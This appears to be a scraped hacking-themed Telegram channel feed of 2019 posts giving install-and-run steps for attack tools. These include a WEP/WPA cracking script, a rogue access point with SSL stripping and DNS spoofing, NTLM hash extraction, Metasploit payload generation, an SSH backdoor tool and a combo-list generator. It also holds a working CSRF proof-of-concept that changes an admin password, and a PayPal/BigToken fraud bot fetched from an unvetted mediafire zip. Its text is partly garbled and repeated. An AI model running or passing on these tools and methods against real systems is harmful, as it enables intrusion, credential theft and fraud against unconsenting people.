UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.3K links
๐Ÿฆ‘ Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

โœจ Web & Services:
โ†’ Undercode.help
Download Telegram
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ 2019 who interested to start programming Chirp is a modern low-level programming language written in C++
t.me/UnderCodeTestingOfficial

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/chirp-language/Chirp.git

2)cd Chirp

3)sh build.sh

๐Ÿฆ‘Features:

> Variable declaration 24-07-2019

> Variable definition 25-07-2019

> Math 25-07-2019

> Functions 26-07-2019

> Function calls 27-07-2019

> Inline assembly 28-07-2019

> If statements

> Else statements

> While statements

> For statements

> Imports

> Pointers

> Macros

> Dynamic memory allocation

> IO library

> Math library

> Eve library

๐Ÿฆ‘Tested by UndercOde On ubanto server

@ ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘
Shell Script For Attacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2) 2019
instagram.com/UnderCodeTestingCompany

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/esc0rtd3w/wifi-hacker

2) cd wifi-hacker

3) chmod 777 wifi-hacker

4) ./wifi-hacker.sh

๐Ÿฆ‘Tested ON

> kali

> root termux

@ ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘2019 ANDROID BUG
T.me/UnderCodeTestingOfficial

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

1) This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

2) Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.

3) The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications.

4) Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

๐Ÿฆ‘2019-12-01 security patch level vulnerability details:


CVE-2019-2232 A-140632678 DoS Critical 8.0, 8.1, 9, 10
CVE-2019-9464 A-141028068 [2] [3] [4] EoP High 10
CVE-2019-2217 A-141003796 EoP High 10
CVE-2019-2218 A-141169173 EoP High 10
CVE-2019-2220 A-138636979 [2] ID High 9, 10
CVE-2019-2221 A-138583650 [2] EoP Moderate 10

๐Ÿฆ‘In Kernel Also !!!!

CVE-2018-20961 A-139522588
Upstream kernel EoP High USB MIDI class function driver
CVE-2019-15220 A-140329469
Upstream kernel EoP High Prism54 WiFi USB Driver
CVE-2019-15239 A-140328996
Upstream kernel EoP High TCP Stack

๐Ÿฆ‘In Qualcomm components

CVE-2019-10557 A-78657016
QC-CR#2255369
QC-CR#2259707 N/A High WLAN host
CVE-2018-11980 A-140423440
QC-CR#2270117 N/A High WLAN host
CVE-2019-10480 A-140423811
QC-CR#2309399 N/A High WLAN host
CVE-2019-10481 A-140423794
QC-CR#2304610
QC-CR#2318632 N/A High WLAN host
CVE-2019-10536 A-140423334
QC-CR#2433802 N/A High WLAN host
CVE-2019-10537 A-140423693
QC-CR#2436502 N/A High WLAN host
CVE-2019-10595 A-140423810
QC-CR#2148184 N/A High WLAN host
CVE-2019-10598 A-140423155
QC-CR#2324139 N/A High WLAN host
CVE-2019-10601 A-140423156
QC-CR#2428798 N/A High WLAN host
CVE-2019-10605 A-140424124
QC-CR#2187441 N/A High WLAN host
CVE-2019-10607 A-140423690
QC-CR#2211711 N/A High Security
CVE-2019-2304 A-123238115
QC-CR#2331868
QC-CR#2335530
QC-CR#2348299
QC-CR#2203904* N/A High WLAN host


Written @UnderCodeOfficial

โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘How To Automatically exported from code.google.com/ p/hexorbase
(t.me/UnderCodeTestingOfficial

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

> It works on Linux and Windows running the following:

1) git clone https://github.com/savio-code/hexorbase

2) cd hexorbase

3) dpkg -i hexorbase_1.0_all.deb

4) Software Icon can be found at the application Menu of the GNOME desktop interfaces

Icon can also be found at /usr/share/applications for KDE and also GNOME:

> There you find "HexorBase.desktop"

๐Ÿฆ‘Requirements:

1) python

2) python-qt4

3) cx_Oracle

4) python-mysqldb

5) python-psycopg2

6) python-pymssql

7) python-qscintilla2

Use For Learning Only

@ UnderCodeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘What is PostgreSQL ? (@ wikipedia)
t.me/UnderCodeTestingOfficial

> PostgreSQL is a general purpose and object-relational database management system, the most advanced open source database system. PostgreSQL was developed based on POSTGRES 4.2 at Berkeley Computer Science Department, University of California.

>PostgreSQL was designed to run on UNIX-like platforms. However, PostgreSQL was then also designed to be portable so that it could run on various platforms such as Mac OS X, Solaris, and Windows.

>PostgreSQL is free and open source software. Its source code is available under PostgreSQL license, a liberal open source license. You are free to use, modify and distribute PostgreSQL in any form.

>PostgreSQL requires very minimum maintained efforts because of its stability. Therefore, if you develop applications based on PostgreSQL, the total cost of ownership is low in comparison with other database management systems.

๐Ÿฆ‘Features:

> User-defined types

> Table inheritance

> Sophisticated locking mechanism

> Foreign key referential integrity

> Views, rules, subquery

๐Ÿฆ‘Official Download Link:

>https://www.postgresql.org/

> Nested transactions (savepoints)

> Multi-version concurrency control (MVCC)

> Asynchronous replication

@ ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Best IKE Scanner Original Tool
instagram.com/UnderCodeTestingCompany

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

Termux-root/Kali/Debian/Parrot

1) git clone https://github.com/royhills/ike-scan

2) cd ike-scan

3) autoreconf --install to generate a viable ./configure file

4) Run ./configure or ./configure --with-openssl to use the OpenSSL libraries

5) Run make to build the project

6) Run make check to verify that everything works as expected

7) Run make install

8) ike-scan -h

๐Ÿฆ‘Features:

1) Discovery Determine which hosts in a given IP range are running IKE. This is done by displaying those hosts which respond to the IKE requests sent by ike-scan.

2) Fingerprinting Determine which IKE implementation the hosts are using, and in some cases determine the version of software that they are running. This is done in two ways: firstly by UDP backoff fingerprinting which involves recording the times of the IKE response packets from the target hosts and comparing the observed retransmission backoff pattern against known patterns; and secondly by Vendor ID fingerprinting which compares Vendor ID payloads from the VPN servers against known vendor id patterns.

3) Transform Enumeration Find which transform attributes are supported by the VPN server for IKE Phase-1 (e.g. encryption algorithm, hash algorithm etc.).

4) User Enumeration For some VPN systems, discover valid VPN usernames.

5) Pre-Shared Key Cracking Perform offline dictionary or brute-force password cracking for IKE Aggressive Mode with Pre-Shared Key authentication. This uses ike-scan to obtain the hash and other parameters, and psk-crack (which is part of the ike-scan package) to perform the cracking

@ ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Facebook Vulnerability Simple bug fond On Facebook since-2018
Facebook And Google Reviews System For Businesses

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

> Cross-Site Request Forgery

> Version: v1 (REQUIRED)

๐Ÿฆ‘ Tested on: Linux

# 1 Poof Of Concept (Change password):
<html>
<body>
<form action="http://Target/action.php?action=profile" method="post" class="form-horizontal form-bordered">
<input class="form-control" name="name" value="Admin" type="text">
<input class="form-control" name="email" value="admin@ranksol.com" type="text">
<input class="form-control" name="password" value="password" type="text">
<input class="form-control" name="phone" value="+18323041166" type="text">
<input type="hidden" name="id" value="1">
<button type="submit" name="submit" value="submit" class="btn btn-fill btn-success "><span class="ace-icon fa fa-save bigger-120"></span> Save</button>
</form>
</body>
</html>

@ ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘How Extract Password from Hash
t.me/UnderCodeTestingOfficial

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

A) DSInternals PowerShell

> The DSInternals PowerShell Module provides easy-to-use cmdlets that are built on top of its Framework. The main features include offline ntds.dit file manipulation and querying domain controllers through the Directory Replication Service (DRS) Remote Protocol.

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/MichaelGrafnetter/DSInternals

2) cd DSInternals

3) Now Extract the DSInternals directory to your PowerShell modules directory, e.g. C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DSInternals or C:\Users\John\Documents\WindowsPowerShell\Modules\DSInternals.
(Optional) If you copied the module to a different directory than advised in the previous step, you have to manually import it using the Import-Module cmdlet.



๐Ÿฆ‘How It Works ?

This method is only applicable to Windows users. To extract NTLM hashes you can take the help of the following commands Example:


1) Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Install-Module DSInternals
Import-Module DSInternals
1...
2...
3...

2) Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Install-Module DSInternals
Import-Module DSInternals)

๐Ÿฆ‘Tested On:

>Win 10
e n j o y
Written ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Method Earn money in paypal

๐Ÿฆ‘Use For learn Not For Stealing
T.me/UnderCodeTestinGOfficial

1.Download the text plus application create a virtual number
2. Download bigtoken from play store
3. Download termux
4. Register in bigtoken with your virtual number and with this referral code so they don't give you ban: PUMECMF00 (Important)
5. Download this:

https://www.mediafire.com/file/iem8zh356sfb2hs/bigtoken.zip/file

and extract it in downloads
6. Go to termux and enter the following commands

$ pkg update && pkg upgrade
$ pkg install php
$ pkg install nano
$ pkg install git
$ termux-setup-storage
$ cd storage
$ cd downloads
$ ls
$ cd bigtoken
$ php bot.php

7. Enter your email and password with which you created the bigtoken account
8. Press the letter: "Y" and enter
9. Press the number: "2" and enter

Do not take more than 25 dollars in a week since they could give you ban
Do the method every 24 hours to avoid suspicion

๐Ÿฆ‘TESTED

@ KADRINO
-------UNDER๐•ฎ๐–”D๐–Š-----
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘How Extract Password from Hash
t.me/UnderCodeTestingOfficial

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

A) DSInternals PowerShell

> The DSInternals PowerShell Module provides easy-to-use cmdlets that are built on top of its Framework. The main features include offline ntds.dit file manipulation and querying domain controllers through the Directory Replication Service (DRS) Remote Protocol.

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/MichaelGrafnetter/DSInternals

2) cd DSInternals

3) Now Extract the DSInternals directory to your PowerShell modules directory, e.g. C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DSInternals or C:\Users\John\Documents\WindowsPowerShell\Modules\DSInternals.
(Optional) If you copied the module to a different directory than advised in the previous step, you have to manually import it using the Import-Module cmdlet.



๐Ÿฆ‘How It Works ?

This method is only applicable to Windows users. To extract NTLM hashes you can take the help of the following commands Example:


1) Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Install-Module DSInternals
Import-Module DSInternals
1...
2...
3...

2) Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Install-Module DSInternals
Import-Module DSInternals)

๐Ÿฆ‘Tested On:

>Win 10
e n j o y
Written ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚
๐Ÿฆ‘All in one 2019 recon, scanning,
parsing, and creating malicious payloads and listeners with Metasploit. For use with Kali Linux
and the Penetration Testers Framework (PTF).
instagram.com/UnderCodeTestingCompany

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:
1) git clone https://github.com/leebaird/discover /opt/discover/
> All scripts must be ran from this location.

2) cd /opt/discover/

3) chmod 777 update.sh

4) ./update.sh


๐Ÿฆ‘RECON
1. Domain
2. Person
3. Parse salesforce

๐Ÿฆ‘SCANNING
4. Generate target list
5. CIDR
6. List
7. IP, range, or domain
8. Rerun Nmap scripts and MSF aux

๐Ÿฆ‘WEB
9. Insecure direct object reference
10. Open multiple tabs in Firefox
11. Nikto
12. SSL

๐Ÿฆ‘MISC
13. Parse XML
14. Generate a malicious payload
15. Start a Metasploit listener

@ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘How to create a fake AP and sniff data.
t.me/UndercOdeTestingOfficial
๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:
1) git clone https://github.com/xdavidhu/mitmAP

2) cd mitmAP

3) python mitmAP.py

๐Ÿฆ‘How it Works:

1) SSLstrip2 for HSTS bypass

2) Image capture with Driftnet

3) TShark for command line .pcap capture

๐Ÿฆ‘Features:

> SSLstrip2

> Driftnet

> Tshark

> Full featured access point, with configurable speed limit

> mitmproxy

> Wireshark

> DNS Spoofing

> Saving results to file
@ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.
instagram.com/UndercOdeTestingCompany
๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:
1) git clone https://github.com/codingo/Reconnoitre.git

> After you have done this run setup.py with the following:

2) python3 setup.py install

3) After setup has run Reconnoitre will now be in your path (as reconnoitre) and you can launch it anywhere using:

reconnoitre <args>

๐Ÿฆ‘Commands:

Argument Description
-h, --help Display help message and exit
-t TARGET_HOSTS Set either a target range of addresses or a single host to target. May also be a file containing hosts.
-o OUTPUT_DIRECTORY Set the target directory where results should be written.
-w WORDLIST Optionally specify your own wordlist to use for pre-compiled commands, or executed attacks.
--pingsweep Write a new target.txt file in the OUTPUT_DIRECTORY by performing a ping sweep and discovering live hosts.
--dns, --dnssweep Find DNS servers from the list of target(s).
--snmp Find hosts responding to SNMP requests from the list of target(s).
--services Perform a service scan over the target(s) and write recommendations for further commands to execute.
--hostnames Attempt to discover target hostnames and write to hostnames.txt.
--virtualhosts Attempt to discover virtual hosts using the specified wordlist. This can be expended via discovered hostnames.
--ignore-http-codes Comma separated list of http codes to ignore with virtual host scans.
--ignore-content-length Ignore content lengths of specificed amount. This may become useful when a server returns a static page on every virtual host guess.
--quiet Supress banner and headers and limit feedback to grepable results.
--quick Move to the next target after performing a quick scan and writing first-round recommendations.
--no-udp Disable UDP service scanning, which is ON by default.

@ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘2019 tool that discovers valid subdomains for websites.

> Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
instagram.com/UnderCodeTestingCompany
๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:
1) git clone https://github.com/projectdiscovery/subfinder/releases/

2) Download .tar

3) tar -xzvf subfinder-linux-amd64.tar

4) mv subfinder-linux-amd64 /usr/bin/subfinder

5)subfinder

๐Ÿฆ‘If you want to build it yourself, you can go get the repo

> go get -v github.com/projectdiscovery/subfinder/cmd/subfinder

> If you wish to upgrade the package you can use:

> go get -u -v github.com/projectdiscovery/subfinder/cmd/subfinder


๐Ÿฆ‘Running:

1) If you are using docker, you need to first create your directory structure holding subfinder configuration file. After modifying the default config.yaml file, you can run:

2) mkdir $HOME/.config/subfinder

3) cp config.yaml $HOME/.config/subfinder/config.yaml

4) nano $HOME/.config/subfinder/config.yaml

5) docker run -v $HOME/.config/subfinder:/root/.config/subfinder -it ice3man/subfinder -d freelancer.com

๐Ÿฆ‘How To Use:

1) Running Subfinder

To run the tool on a target, just use the following command.

2) subfinder -d freelancer.com

This will run the tool against freelancer.com. There are a number of configuration options that you can pass along with this command. The verbose switch (-v) can be used to display verbose information.

[CERTSPOTTER] www.fi.freelancer.com
[DNSDUMPSTER] hosting.freelancer.com
[DNSDUMPSTER] support.freelancer.com
[DNSDUMPSTER] accounts.freelancer.com
[DNSDUMPSTER] phabricator.freelancer.com
[DNSDUMPSTER] cdn1.freelancer.com
[DNSDUMPSTER] t1.freelancer.com
[DNSDUMPSTER] wdc.t1.freelancer.com
[DNSDUMPSTER] dal.t1.freelancer.com

The -o command can be used to specify an output file.

> subfinder -d freelancer.com -o output.txt

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Termux exploite databse /see bugs in server + auto nmap and much more via simple automate script
twitter.com/UnderCodeTC

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/kuburan/txtool

2) cd txtool

3) apt install python2

4) ./install.py

5) txtool

6) for ssh backdoor access, txtool used paramiko python library that required PyNacl if you have an error installing PyNacl, follow my steps:

> apt-get install --assume-yes libsodium libsodium-dev

> SODIUM_INSTALL=system pip2 install pynacl

E N J O Y

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Generate combos based on Keywords with Termux
instagram.com/UnderCodeTestingCompany

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) apt update&&apt upgrade -y

2) termux-setup-storage

3) pkg install php git -y

4) git clone https://github.com/Juni0r007/PasTerm.git

5) cd PasTerm

6) Ejecutamos el archivo *.php

7) chmod +x pasterm.php;

chmod +x pasterm.class.php

8) php pasterm.php

๐Ÿฆ‘Vid Tutorial:

> https://www.youtube.com/watch?v=0k9D20r2Q3U

Thats All
@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–